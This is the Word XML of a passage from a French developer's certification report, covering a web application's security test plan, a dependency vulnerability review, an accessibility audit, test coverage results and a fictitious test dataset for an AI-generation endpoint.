            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">404</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">partout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TS-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Élévation verticale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Depuis un compte</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, appeler chaque route</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/admin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">403</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">partout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TS-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Limitation de débit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Enchaîner les tentatives de connexion —</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">429</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">au seuil, réponse en JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TS-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Absence de secret dans le dépôt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git log -p</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">filtré sur les motifs de clés ;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.env</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">absent de l'historique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TS-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Démarrage sans</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT_SECRET_KEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>L'application refuse de démarrer (§ 6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TS-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attributs du cookie de refresh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Avec</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">APP_ENV=production</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">:</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SameSite=Strict</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, chemin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TS-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dépendances vulnérables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>npm audit et pip-audit — aucune vulnérabilité haute ou critique en dépendance de production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TS-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Origine CORS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Une requête authentifiée depuis une origine non déclarée est refusée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>TS-09 est le seul test de cette liste qui puisse échouer sans qu'aucune ligne de code ait changé : une vulnérabilité publiée hier rend rouge un code inchangé. Sa place est donc dans le pipeline d'intégration continue (§ 6) et non dans une campagne ponctuelle — c'est ce qui relie ce plan de tests au journal de veille du § 11. Il y est aujourd'hui exécuté à la main : l'étape automatisée reste à ajouter, et c'est le dernier point ouvert du pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Le dernier passage manuel, le 4 octobre, a signalé quatre vulnérabilités de niveau élevé, toutes issues de la même chaîne : @vue/eslint-config-typescript → fast-glob → micromatch → braces@3.0.3 (GHSA-vfj7-8cjw-p6xm). Aucune version corrigée n'existe dans cette branche. Le constat n'est pas bloquant et le dire précisément vaut mieux que l'afficher en rouge : il s'agit d'une dépendance de développement, qui n'entre pas dans le paquet livré, et le déni de service décrit suppose qu'un attaquant contrôle les motifs passés à ESLint — c'est-à-dire qu'il écrit déjà dans le dépôt. À revoir quand l'amont publiera un correctif.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="130"/>
    <w:bookmarkStart w:id="131" w:name="Xf02f189b7330c4016430a8aa3a534db14d3b04f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tests d'accessibilité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>L'audit a été mené le 3 octobre 2026 (docs/audit-accessibilite.md) : axe-core sur l'application démarrée, les dix écrans publics puis les cinq écrans authentifiés, ceux-ci dans un conteneur jetable avec un compte de test et une connexion par l'interface. Référentiel RGAA 4.1.2 (§ 11).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Le résultat tient en un chiffre et une nuance. Le chiffre : 120 occurrences sur trois règles, dont 117 dues à une seule couleur — l'accent #E0533C de la charte (§ 5.3) ne tenait pas le rapport de contraste de 4,5:1 sur le fond clair. L'assombrir en #C4341C a corrigé 64 violations mesurées sur les dix écrans publics, pour une modification de 199 occurrences dans 19 fichiers. Les teintes de survol ont suivi (#A72C18), sans quoi le survol serait devenu plus clair que l'état normal. Deux constats restaient ensuite : l'étiquette du champ de quota du back-office, seul constat de niveau critique — la page affiche autant de champs que de lignes, un aria-label citant l'utilisateur concerné était donc nécessaire — et la zone CodeMirror, qu'aucune balise &lt;label&gt; ne peut désigner puisqu'il s'agit d'un contenteditable, traitée par EditorView.contentAttributes. Bilan après correction : 15 écrans, 0 violation axe-core, WCAG 2.0 et 2.1, niveaux A et AA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>La nuance est plus importante que le chiffre. Un « 0 violation » automatisé ne vaut pas conformité RGAA : axe-core mesure des contrastes et repère des attributs manquants, mais il ne sait pas dire si un libellé est compréhensible, ni si l'ordre de tabulation suit l'ordre de lecture. Les contrôles manuels ont d'ailleurs relevé ce que l'outil n'avait pas vu : les seize écrans partagent le même titre de page, il n'y a pas de lien d'évitement, 22 éléments n'ont pas de focus visible faute d'une règle :focus-visible globale, le pied de page saute un niveau de titre sur cinq écrans, l'accueil n'a pas de &lt;main&gt; et « Nouveau document » pas de &lt;h1&gt;. Ces six points sont chiffrés à environ trois heures et demie et restent à traiter.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="131"/>
    <w:bookmarkStart w:id="132" w:name="X01737514c45077be3bcd5ca4619b2e142b840d9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Critères d'acceptation et automatisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une fonctionnalité n'est considérée comme terminée que si l'analyse statique passe sans erreur, si les tests unitaires et d'intégration qui la concernent passent, si son cas fonctionnel est vérifié, et si aucune vulnérabilité haute ou critique n'est signalée sur les dépendances.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>L'objectif de couverture est de 80 % sur la couche services/ et sur les routes, sans objectif chiffré ailleurs. Viser un pourcentage global pousse à écrire des tests faciles sur du code sans risque ; cibler les couches sensibles est plus utile. Le pipeline GitHub Actions (§ 6) enchaîne Ruff, ESLint, Prettier, vue-tsc, pytest, Vitest et la construction des images à chaque push et chaque pull request ; pip-audit et npm audit restent à y brancher.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>État d'exécution — campagne du 3 octobre 2026. Les suites automatisées ont été écrites et exécutées : 146 cas backend (50 unitaires, 79 d'intégration, 17 de sécurité) et 42 cas Vitest, soit 188 cas, tous au vert en 59 secondes ; une seconde campagne le même jour a ajouté 7 cas couvrant les correctifs de sécurité — purge des sessions, limitation de débit sur le rafraîchissement, clé de session Flask — pour un total de 195. La couverture backend est de 95 % : 100 % sur services/ et sur database/db.py, 89 à 96 % sur routes/. La couverture frontend, à 62 %, est tirée vers le bas par les cinq modules de service, qui sont des enveloppes d'une ligne autour d'axios : les tester reviendrait à tester axios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Ce qui reste. Les tests système TS-01 à TS-10 attendent la validation de la pile conteneurisée sur une machine disposant d'un démon Docker ; les tests d'acceptation attendent le point de validation avec le formateur ; les tests de charge viennent après. Ces trois lots sont les seuls critères de sortie non satisfaits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Une leçon de méthode, et c'est celle que je retiens de la campagne : les doubles de test mentent. Trois défauts de la chaîne IA sont passés sous un faux requests.post qui acceptait json() à tout moment et ne libérait jamais de connexion — dont précisément celui qui rendait illisible le diagnostic d'Ollama une fois la connexion fermée (§ 7.2). Il a fallu un vrai serveur HTTP, un http.server qui imite /api/generate, pour les voir. Les tests ajoutés ensuite ont été vérifiés par mutation : on casse volontairement le code pour s'assurer qu'ils échouent. Un test qu'on n'a jamais vu échouer ne prouve rien.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="132"/>
    <w:bookmarkStart w:id="133" w:name="X25212430a281d71bdc0386a3e3977d11c129f5b"/>
    <w:p w14:paraId="232BB653" w14:textId="3C66AF9E" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00690DDD" w:rsidP="00690DDD">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>La</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> présentation d’un jeu d’essai élaboré par le candidat </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Fonctionnalité retenue et justification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le jeu d'essai porte sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">la génération d'une assistance IA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /documents/&lt;id&gt;/ia/generer</w:t>
      </w:r>
      <w:r>
        <w:t>. C'est la fonctionnalité la plus significative du projet à trois titres : elle traverse les trois couches du backend et sollicite un système externe (§ 5.2) ; elle concentre cinq contrôles de nature différente — authentification, validation, autorisation, quota, disponibilité (§ 5.7) ; et elle porte les deux exigences les plus délicates du cahier des charges, le quota de 20 appels par 24 heures et la traçabilité des interactions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>C'est aussi la fonctionnalité qu'aucune capture d'écran ne peut attester, puisqu'elle se manifeste par un enchaînement et non par un état (§ 4, § 12.2). D'où la nécessité d'un jeu d'essai documenté.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="133"/>
    <w:bookmarkStart w:id="134" w:name="X7c50809e322bf8c10e3c3d5a4c79327834f56e9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Données de départ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le jeu de données est construit par un script de préparation, pour être reproductible à l'identique. Les mots de passe sont des valeurs de test et les adresses utilisent le domaine réservé</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; aucune donnée personnelle réelle n'y figure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Comptes</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="autofi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Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Quota</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rôle dans le jeu d'essai</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">alice@example.test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Utilisatrice principale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bob@example.test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tiers — sert aux tests d'accès croisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">admin@example.test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vérifie la modification du quota</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">quota@example.test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Quota abaissé pour atteindre la limite en un appel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Documents</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Propriétaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Titre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contenu initial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compte rendu de réunion du 12 mars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Trois paragraphes de notes brutes, fautes volontaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
